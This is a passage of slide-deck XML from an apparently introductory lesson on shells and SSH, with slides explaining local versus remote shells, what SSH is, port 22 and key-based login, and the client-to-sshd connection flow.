              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="Google Shape;198;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4697730" y="1405890"/>
            <a:ext cx="3943350" cy="3360420"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 1633"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9" name="Google Shape;199;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="1611630"/>
            <a:ext cx="480060" cy="48006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00" name="Google Shape;200;p20"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4965877" y="1674038"/>
            <a:ext cx="355244" cy="355244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Google Shape;201;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5520690" y="1680210"/>
            <a:ext cx="29832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300"/>
              <a:buFont typeface="Cambria"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1300" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1B1E1D"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
                <a:ea typeface="Cambria"/>
                <a:cs typeface="Cambria"/>
                <a:sym typeface="Cambria"/>
              </a:rPr>
              <a:t>Remote shell</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1300" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202" name="Google Shape;202;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="2228850"/>
            <a:ext cx="3531870" cy="137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SSH connects you to a shell process running on someone else's hardware entirely. Your laptop is just relaying keystrokes over the network. The shell, its CPU time, and its files all belong to the remote machine.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="203" name="Google Shape;203;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4903470" y="3874770"/>
            <a:ext cx="353187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900"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="660000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Close your laptop badly, and the remote shell can keep running without you.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Google Shape;204;p20"/>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Local vs remote shells</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="Google Shape;205;p20"/>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10" name="Shape 210"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Google Shape;211;p21"/>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DEFINITION #2</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="Google Shape;212;p21"/>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What is SSH?</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Google Shape;213;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1405890"/>
            <a:ext cx="8161020" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 4000"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4" name="Google Shape;214;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1611630"/>
            <a:ext cx="582930" cy="58293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15" name="Google Shape;215;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="761581" y="1687411"/>
            <a:ext cx="431369" cy="431369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Google Shape;216;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1405890" y="1577340"/>
            <a:ext cx="7063740" cy="102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libri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="1B1E1D"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Secure Shell (SSH): an encrypted network protocol for logging into another computer's command line over a network. Everything, including your password or key, is encrypted in transit.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Google Shape;217;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="2983230"/>
            <a:ext cx="2606040" cy="1748790"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 3137"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8" name="Google Shape;218;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508760" y="318897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19" name="Google Shape;219;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1580084" y="3260293"/>
            <a:ext cx="405994" cy="405994"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="Google Shape;220;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="582930" y="3874770"/>
            <a:ext cx="24003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Port 22</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="Google Shape;221;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617220" y="4183380"/>
            <a:ext cx="233172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default port SSH servers (sshd) listen on.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="Google Shape;222;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3257550" y="2983230"/>
            <a:ext cx="2606040" cy="1748790"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 3137"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3" name="Google Shape;223;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4286250" y="318897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24" name="Google Shape;224;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4357574" y="3260293"/>
            <a:ext cx="405994" cy="405994"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="Google Shape;225;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3360420" y="3874770"/>
            <a:ext cx="24003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Two ways in</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="Google Shape;226;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3394710" y="4183380"/>
            <a:ext cx="233172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password, or a public/private key pair (preferred, much harder to brute-force).</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="Google Shape;227;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6035040" y="2983230"/>
            <a:ext cx="2606040" cy="1748790"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 3137"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28" name="Google Shape;228;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7063740" y="3188970"/>
            <a:ext cx="548640" cy="54864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29" name="Google Shape;229;p21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7135063" y="3260293"/>
            <a:ext cx="405994" cy="405994"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6137910" y="3874770"/>
            <a:ext cx="24003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Text only</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="Google Shape;231;p21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172200" y="4183380"/>
            <a:ext cx="233172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You get a command line, not a graphical desktop.</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="Google Shape;232;p21"/>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What is SSH?</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Google Shape;233;p21"/>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8" name="Shape 238"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="Google Shape;239;p22"/>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PUTTING IT TOGETHER</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1000" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="Google Shape;240;p22"/>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What happens when you type ssh</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="Google Shape;241;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="1645920"/>
            <a:ext cx="147447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2" name="Google Shape;242;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="977265" y="1796796"/>
            <a:ext cx="480060" cy="48006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43" name="Google Shape;243;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1039672" y="1859203"/>
            <a:ext cx="355244" cy="355244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Google Shape;244;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="2331720"/>
            <a:ext cx="133731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Your laptop</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Google Shape;245;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="562356" y="2592324"/>
            <a:ext cx="1309878"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SSH client sends your login request</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="Google Shape;246;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1954530" y="2077974"/>
            <a:ext cx="192024"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0000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1700" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="660000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>→</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Google Shape;247;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2146554" y="1645920"/>
            <a:ext cx="147447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8" name="Google Shape;248;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2643759" y="1796796"/>
            <a:ext cx="480060" cy="48006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49" name="Google Shape;249;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2706167" y="1859203"/>
            <a:ext cx="355244" cy="355244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="Google Shape;250;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2215134" y="2331720"/>
            <a:ext cx="133731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The network</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="Google Shape;251;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2228850" y="2592324"/>
            <a:ext cx="1309878"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Everything encrypted end to end</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Google Shape;252;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3621024" y="2077974"/>
            <a:ext cx="192024"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0000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1700" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="660000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>→</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Google Shape;253;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3813048" y="1645920"/>
            <a:ext cx="147447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54" name="Google Shape;254;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4310253" y="1796796"/>
            <a:ext cx="480060" cy="48006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55" name="Google Shape;255;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4372661" y="1859203"/>
            <a:ext cx="355244" cy="355244"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="Google Shape;256;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3881628" y="2331720"/>
            <a:ext cx="133731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sshd</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Google Shape;257;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3895344" y="2592324"/>
            <a:ext cx="1309878"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The SSH daemon on the remote host authenticates you</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Google Shape;258;p22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5287518" y="2077974"/>
            <a:ext cx="192024"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0000"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en" sz="1700" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="660000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>→</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1700" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
